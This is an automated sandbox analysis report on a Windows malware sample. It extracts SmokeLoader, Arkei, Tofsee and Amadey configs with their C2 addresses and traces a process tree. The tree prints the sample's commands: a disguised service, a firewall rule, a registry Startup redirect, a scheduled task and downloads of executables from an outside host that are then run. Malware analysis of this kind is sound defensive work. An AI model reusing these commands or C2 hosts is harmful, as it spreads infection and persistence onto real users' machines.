Analysis

  • max time kernel
    128s
  • max time network
    153s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    13-01-2022 19:46

General

  • Target

    a7444553f8a8fe2702b6fd48008d6605.exe

  • Size

    277KB

  • MD5

    a7444553f8a8fe2702b6fd48008d6605

  • SHA1

    f6d3d6ccf728ae7ab39b7e29f21ae5bcc7fce98b

  • SHA256

    ba5303301925a877689b30efc36f872564f06906b2a61d7c3a7c955b0587d4f8

  • SHA512

    28a1edb043ae30af213cbfe93745f2d94a4f9f5b76668cbed0889780dc7031e4a6d1caa839d78035a42769bc13d2d0a376e13e50779807edbcd3189d44f070bf

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://host-data-coin-11.com/

http://file-coin-host-12.com/

rc4.i32
rc4.i32

Extracted

Family

arkei

Botnet

Default

C2

http://file-file-host4.com/tratata.php

Extracted

Family

tofsee

C2

patmushta.info

parubey.info

Extracted

Family

amadey

Version

3.01

C2

185.215.113.35/d2VxjasuwS/index.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Arkei

    Arkei is an infostealer written in C++.

  • LoaderBot

    LoaderBot is a loader written in .NET downloading and executing miners.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • suricata: ET MALWARE Amadey CnC Check-In

    suricata: ET MALWARE Amadey CnC Check-In

  • suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)

    suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)

  • Arkei Stealer Payload 2 IoCs
  • LoaderBot executable 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 23 IoCs
  • Modifies Windows Firewall 1 TTPs
  • UPX packed file 6 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Deletes itself 1 IoCs
  • Loads dropped DLL 4 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 8 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a7444553f8a8fe2702b6fd48008d6605.exe
    "C:\Users\Admin\AppData\Local\Temp\a7444553f8a8fe2702b6fd48008d6605.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1452
    • C:\Users\Admin\AppData\Local\Temp\a7444553f8a8fe2702b6fd48008d6605.exe
      "C:\Users\Admin\AppData\Local\Temp\a7444553f8a8fe2702b6fd48008d6605.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:1084
  • C:\Users\Admin\AppData\Local\Temp\8B7D.exe
    C:\Users\Admin\AppData\Local\Temp\8B7D.exe
    1⤵
    • Executes dropped EXE
    PID:576
  • C:\Users\Admin\AppData\Local\Temp\93DC.exe
    C:\Users\Admin\AppData\Local\Temp\93DC.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1940
    • C:\Users\Admin\AppData\Local\Temp\93DC.exe
      C:\Users\Admin\AppData\Local\Temp\93DC.exe
      2⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:1112
  • C:\Users\Admin\AppData\Local\Temp\AE8D.exe
    C:\Users\Admin\AppData\Local\Temp\AE8D.exe
    1⤵
    • Executes dropped EXE
    PID:1988
  • C:\Users\Admin\AppData\Local\Temp\C411.exe
    C:\Users\Admin\AppData\Local\Temp\C411.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:1196
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\njjjzucd\
      2⤵
        PID:1168
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\gzotmolu.exe" C:\Windows\SysWOW64\njjjzucd\
        2⤵
          PID:1864
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create njjjzucd binPath= "C:\Windows\SysWOW64\njjjzucd\gzotmolu.exe /d\"C:\Users\Admin\AppData\Local\Temp\C411.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:1700
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description njjjzucd "wifi internet conection"
            2⤵
              PID:1292
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start njjjzucd
              2⤵
                PID:1580
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:1216
              • C:\Users\Admin\AppData\Local\Temp\D8F9.exe
                C:\Users\Admin\AppData\Local\Temp\D8F9.exe
                1⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:1944
                • C:\Users\Admin\AppData\Local\Temp\D8F9.exe
                  C:\Users\Admin\AppData\Local\Temp\D8F9.exe
                  2⤵
                  • Executes dropped EXE
                  PID:1724
              • C:\Windows\SysWOW64\njjjzucd\gzotmolu.exe
                C:\Windows\SysWOW64\njjjzucd\gzotmolu.exe /d"C:\Users\Admin\AppData\Local\Temp\C411.exe"
                1⤵
                • Executes dropped EXE
                PID:1356
              • C:\Users\Admin\AppData\Local\Temp\5223.exe
                C:\Users\Admin\AppData\Local\Temp\5223.exe
                1⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:1532
                • C:\Users\Admin\AppData\Local\Temp\82aa4a6c48\mjlooy.exe
                  "C:\Users\Admin\AppData\Local\Temp\82aa4a6c48\mjlooy.exe"
                  2⤵
                  • Executes dropped EXE
                  PID:1620
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\82aa4a6c48\
                    3⤵
                      PID:460
                      • C:\Windows\SysWOW64\reg.exe
                        REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\82aa4a6c48\
                        4⤵
                          PID:1560
                      • C:\Windows\SysWOW64\schtasks.exe
                        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mjlooy.exe /TR "C:\Users\Admin\AppData\Local\Temp\82aa4a6c48\mjlooy.exe" /F
                        3⤵
                        • Creates scheduled task(s)
                        PID:1384
                  • C:\Users\Admin\AppData\Local\Temp\5936.exe
                    C:\Users\Admin\AppData\Local\Temp\5936.exe
                    1⤵
                    • Executes dropped EXE
                    PID:1664
                    • C:\Windows\system32\cmd.exe
                      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\5BA7.tmp\5BB8.tmp\5BB9.bat C:\Users\Admin\AppData\Local\Temp\5936.exe"
                      2⤵
                        PID:1612
                        • C:\Users\Admin\AppData\Local\Temp\5BA7.tmp\5BB8.tmp\extd.exe
                          C:\Users\Admin\AppData\Local\Temp\5BA7.tmp\5BB8.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
                          3⤵
                          • Executes dropped EXE
                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                          PID:1880
                        • C:\Users\Admin\AppData\Local\Temp\5BA7.tmp\5BB8.tmp\extd.exe
                          C:\Users\Admin\AppData\Local\Temp\5BA7.tmp\5BB8.tmp\extd.exe "/download" "http://a0621298.xsph.ru/KX6KAZ9Tip.exe" "setup_c.exe" "" "" "" "" "" ""
                          3⤵
                          • Executes dropped EXE
                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                          PID:1868
                        • C:\Windows\System32\WScript.exe
                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\722\123.vbs"
                          3⤵
                          • Blocklisted process makes network request
                          PID:1568
                        • C:\Users\Admin\AppData\Local\Temp\722\setup_c.exe
                          setup_c.exe
                          3⤵
                          • Executes dropped EXE
                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                          PID:1472
                        • C:\Users\Admin\AppData\Local\Temp\5BA7.tmp\5BB8.tmp\extd.exe
                          C:\Users\Admin\AppData\Local\Temp\5BA7.tmp\5BB8.tmp\extd.exe "/download" "http://a0621298.xsph.ru/RMR.exe" "setup_m.exe" "" "" "" "" "" ""
                          3⤵
                            PID:1720
                          • C:\Users\Admin\AppData\Local\Temp\722\setup_m.exe
                            setup_m.exe
                            3⤵
                            • Executes dropped EXE
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1992
                          • C:\Users\Admin\AppData\Local\Temp\5BA7.tmp\5BB8.tmp\extd.exe
                            C:\Users\Admin\AppData\Local\Temp\5BA7.tmp\5BB8.tmp\extd.exe "/download" "http://a0621298.xsph.ru/c_setup.exe" "setup_s.exe" "" "" "" "" "" ""
                            3⤵
                            • Executes dropped EXE
                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                            PID:1624
                          • C:\Users\Admin\AppData\Local\Temp\722\setup_s.exe
                            setup_s.exe
                            3⤵
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1500
                          • C:\Users\Admin\AppData\Local\Temp\5BA7.tmp\5BB8.tmp\extd.exe
                            C:\Users\Admin\AppData\Local\Temp\5BA7.tmp\5BB8.tmp\extd.exe "" "" "" "" "" "" "" "" ""
                            3⤵
                            • Executes dropped EXE
                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                            PID:1384
                      • C:\Users\Admin\AppData\Local\Temp\7040.exe
                        C:\Users\Admin\AppData\Local\Temp\7040.exe
                        1⤵
                        • Executes dropped EXE
                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                        PID:1720
                      • C:\Users\Admin\AppData\Local\Temp\9435.exe
                        C:\Users\Admin\AppData\Local\Temp\9435.exe
                        1⤵
                        • Executes dropped EXE
                        PID:1672
                      • C:\Users\Admin\AppData\Local\Temp\A2E5.exe
                        C:\Users\Admin\AppData\Local\Temp\A2E5.exe
                        1⤵
                        • Executes dropped EXE
                        PID:1804
                      • C:\Users\Admin\AppData\Local\Temp\C803.exe
                        C:\Users\Admin\AppData\Local\Temp\C803.exe
                        1⤵
                        • Executes dropped EXE
                        PID:1540
                      • C:\Users\Admin\AppData\Local\Temp\D7FB.exe
                        C:\Users\Admin\AppData\Local\Temp\D7FB.exe
                        1⤵
                          PID:2024

                        Network

                        MITRE ATT&CK Enterprise v6

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • memory/576-83-0x0000000000400000-0x0000000000452000-memory.dmp

                          Filesize

                          328KB

                        • memory/576-82-0x00000000001C0000-0x00000000001C9000-memory.dmp

                          Filesize

                          36KB

                        • memory/576-81-0x00000000001B0000-0x00000000001B9000-memory.dmp

                          Filesize

                          36KB

                        • memory/1084-54-0x0000000000400000-0x0000000000409000-memory.dmp

                          Filesize

                          36KB

                        • memory/1084-56-0x0000000075AE1000-0x0000000075AE3000-memory.dmp

                          Filesize

                          8KB

                        • memory/1196-94-0x0000000000220000-0x0000000000233000-memory.dmp

                          Filesize

                          76KB

                        • memory/1196-95-0x0000000000400000-0x0000000000454000-memory.dmp

                          Filesize

                          336KB

                        • memory/1196-93-0x0000000000020000-0x000000000002D000-memory.dmp

                          Filesize

                          52KB

                        • memory/1392-59-0x0000000002940000-0x0000000002956000-memory.dmp

                          Filesize

                          88KB

                        • memory/1392-84-0x0000000004880000-0x0000000004896000-memory.dmp

                          Filesize

                          88KB

                        • memory/1452-58-0x0000000000030000-0x0000000000039000-memory.dmp

                          Filesize

                          36KB

                        • memory/1452-57-0x0000000000020000-0x0000000000029000-memory.dmp

                          Filesize

                          36KB

                        • memory/1472-155-0x00000000002A0000-0x0000000000300000-memory.dmp

                          Filesize

                          384KB

                        • memory/1500-183-0x0000000076730000-0x0000000076777000-memory.dmp

                          Filesize

                          284KB

                        • memory/1500-235-0x0000000004990000-0x0000000004991000-memory.dmp

                          Filesize

                          4KB

                        • memory/1500-188-0x0000000076D60000-0x0000000076EBC000-memory.dmp

                          Filesize

                          1.4MB

                        • memory/1500-176-0x00000000006A0000-0x00000000006E5000-memory.dmp

                          Filesize

                          276KB

                        • memory/1500-184-0x0000000076EC0000-0x0000000076F17000-memory.dmp

                          Filesize

                          348KB

                        • memory/1500-177-0x00000000000C0000-0x00000000000C1000-memory.dmp

                          Filesize

                          4KB

                        • memory/1500-197-0x0000000076F20000-0x0000000076FAF000-memory.dmp

                          Filesize

                          572KB

                        • memory/1500-178-0x0000000000150000-0x00000000001B2000-memory.dmp

                          Filesize

                          392KB

                        • memory/1500-202-0x0000000075AE0000-0x000000007672A000-memory.dmp

                          Filesize

                          12.3MB

                        • memory/1500-230-0x0000000071E00000-0x0000000071E17000-memory.dmp

                          Filesize

                          92KB

                        • memory/1500-232-0x0000000073A20000-0x0000000073A35000-memory.dmp

                          Filesize

                          84KB

                        • memory/1500-200-0x00000000743E0000-0x0000000074460000-memory.dmp

                          Filesize

                          512KB

                        • memory/1500-193-0x0000000000150000-0x00000000001B2000-memory.dmp

                          Filesize

                          392KB

                        • memory/1500-174-0x0000000074D50000-0x0000000074D9A000-memory.dmp

                          Filesize

                          296KB

                        • memory/1500-180-0x0000000076A70000-0x0000000076B1C000-memory.dmp

                          Filesize

                          688KB

                        • memory/1500-195-0x0000000000150000-0x00000000001B2000-memory.dmp

                          Filesize

                          392KB

                        • memory/1500-236-0x00000000769D0000-0x0000000076A05000-memory.dmp

                          Filesize

                          212KB

                        • memory/1500-233-0x0000000071C00000-0x0000000071C52000-memory.dmp

                          Filesize

                          328KB

                        • memory/1532-116-0x00000000006D8000-0x00000000006F6000-memory.dmp

                          Filesize

                          120KB

                        • memory/1532-124-0x0000000000220000-0x0000000000258000-memory.dmp

                          Filesize

                          224KB

                        • memory/1532-125-0x0000000000400000-0x0000000000578000-memory.dmp

                          Filesize

                          1.5MB

                        • memory/1612-140-0x000007FEFBC21000-0x000007FEFBC23000-memory.dmp

                          Filesize

                          8KB

                        • memory/1620-136-0x0000000000400000-0x0000000000578000-memory.dmp

                          Filesize

                          1.5MB

                        • memory/1620-134-0x00000000002E8000-0x0000000000306000-memory.dmp

                          Filesize

                          120KB

                        • memory/1720-185-0x0000000000350000-0x00000000003B0000-memory.dmp

                          Filesize

                          384KB

                        • memory/1724-98-0x0000000000400000-0x0000000000420000-memory.dmp

                          Filesize

                          128KB

                        • memory/1724-101-0x0000000000400000-0x0000000000420000-memory.dmp

                          Filesize

                          128KB

                        • memory/1724-105-0x0000000000400000-0x0000000000420000-memory.dmp

                          Filesize

                          128KB

                        • memory/1724-104-0x0000000000400000-0x0000000000420000-memory.dmp

                          Filesize

                          128KB

                        • memory/1724-97-0x0000000000400000-0x0000000000420000-memory.dmp

                          Filesize

                          128KB

                        • memory/1724-99-0x0000000000400000-0x0000000000420000-memory.dmp

                          Filesize

                          128KB

                        • memory/1724-100-0x0000000000400000-0x0000000000420000-memory.dmp

                          Filesize

                          128KB

                        • memory/1724-108-0x00000000048E0000-0x00000000048E1000-memory.dmp

                          Filesize

                          4KB

                        • memory/1804-249-0x0000000002BD0000-0x0000000002C70000-memory.dmp

                          Filesize

                          640KB

                        • memory/1804-250-0x0000000002DB0000-0x0000000002E70000-memory.dmp

                          Filesize

                          768KB

                        • memory/1804-251-0x0000000000400000-0x0000000002BC5000-memory.dmp

                          Filesize

                          39.8MB

                        • memory/1940-77-0x0000000000020000-0x0000000000029000-memory.dmp

                          Filesize

                          36KB

                        • memory/1944-85-0x0000000004BD0000-0x0000000004BD1000-memory.dmp

                          Filesize

                          4KB

                        • memory/1944-86-0x0000000000220000-0x0000000000221000-memory.dmp

                          Filesize

                          4KB

                        • memory/1944-72-0x0000000000AC0000-0x0000000000B4A000-memory.dmp

                          Filesize

                          552KB

                        • memory/1944-71-0x0000000000AC0000-0x0000000000B4A000-memory.dmp

                          Filesize

                          552KB

                        • memory/1988-87-0x0000000000020000-0x0000000000031000-memory.dmp

                          Filesize

                          68KB

                        • memory/1988-88-0x0000000000220000-0x000000000023C000-memory.dmp

                          Filesize

                          112KB

                        • memory/1988-89-0x0000000000400000-0x0000000000458000-memory.dmp

                          Filesize

                          352KB

                        • memory/1992-164-0x0000000000D90000-0x00000000011EB000-memory.dmp

                          Filesize

                          4.4MB

                        • memory/1992-167-0x00000000000D0000-0x00000000000D1000-memory.dmp

                          Filesize

                          4KB

                        • memory/1992-196-0x0000000000D90000-0x00000000011EB000-memory.dmp

                          Filesize

                          4.4MB

                        • memory/1992-194-0x0000000000D90000-0x00000000011EB000-memory.dmp

                          Filesize

                          4.4MB

                        • memory/1992-192-0x0000000076D60000-0x0000000076EBC000-memory.dmp

                          Filesize

                          1.4MB

                        • memory/1992-163-0x0000000074D50000-0x0000000074D9A000-memory.dmp

                          Filesize

                          296KB

                        • memory/1992-175-0x0000000000280000-0x00000000002C5000-memory.dmp

                          Filesize

                          276KB

                        • memory/1992-198-0x0000000076F20000-0x0000000076FAF000-memory.dmp

                          Filesize

                          572KB

                        • memory/1992-186-0x0000000076A70000-0x0000000076B1C000-memory.dmp

                          Filesize

                          688KB

                        • memory/1992-189-0x0000000076730000-0x0000000076777000-memory.dmp

                          Filesize

                          284KB

                        • memory/1992-190-0x0000000076EC0000-0x0000000076F17000-memory.dmp

                          Filesize

                          348KB

                        • memory/1992-201-0x0000000075AE0000-0x000000007672A000-memory.dmp

                          Filesize

                          12.3MB

                        • memory/1992-199-0x00000000743E0000-0x0000000074460000-memory.dmp

                          Filesize

                          512KB

                        • memory/2024-223-0x0000000076D60000-0x0000000076EBC000-memory.dmp

                          Filesize

                          1.4MB

                        • memory/2024-228-0x0000000075AE0000-0x000000007672A000-memory.dmp

                          Filesize

                          12.3MB

                        • memory/2024-226-0x0000000076F20000-0x0000000076FAF000-memory.dmp

                          Filesize

                          572KB

                        • memory/2024-227-0x00000000743E0000-0x0000000074460000-memory.dmp

                          Filesize

                          512KB

                        • memory/2024-229-0x0000000004DC0000-0x0000000004DC1000-memory.dmp

                          Filesize

                          4KB

                        • memory/2024-224-0x0000000000F90000-0x0000000001013000-memory.dmp

                          Filesize

                          524KB

                        • memory/2024-221-0x0000000076EC0000-0x0000000076F17000-memory.dmp

                          Filesize

                          348KB

                        • memory/2024-231-0x0000000071E00000-0x0000000071E17000-memory.dmp

                          Filesize

                          92KB

                        • memory/2024-220-0x0000000076730000-0x0000000076777000-memory.dmp

                          Filesize

                          284KB

                        • memory/2024-225-0x0000000000F90000-0x0000000001013000-memory.dmp

                          Filesize

                          524KB

                        • memory/2024-219-0x0000000076A70000-0x0000000076B1C000-memory.dmp

                          Filesize

                          688KB

                        • memory/2024-218-0x00000000001C0000-0x0000000000205000-memory.dmp

                          Filesize

                          276KB

                        • memory/2024-234-0x00000000769D0000-0x0000000076A05000-memory.dmp

                          Filesize

                          212KB

                        • memory/2024-216-0x0000000000080000-0x0000000000081000-memory.dmp

                          Filesize

                          4KB

                        • memory/2024-215-0x0000000000F90000-0x0000000001013000-memory.dmp

                          Filesize

                          524KB

                        • memory/2024-214-0x0000000000F90000-0x0000000001013000-memory.dmp

                          Filesize

                          524KB

                        • memory/2024-213-0x0000000074D50000-0x0000000074D9A000-memory.dmp

                          Filesize

                          296KB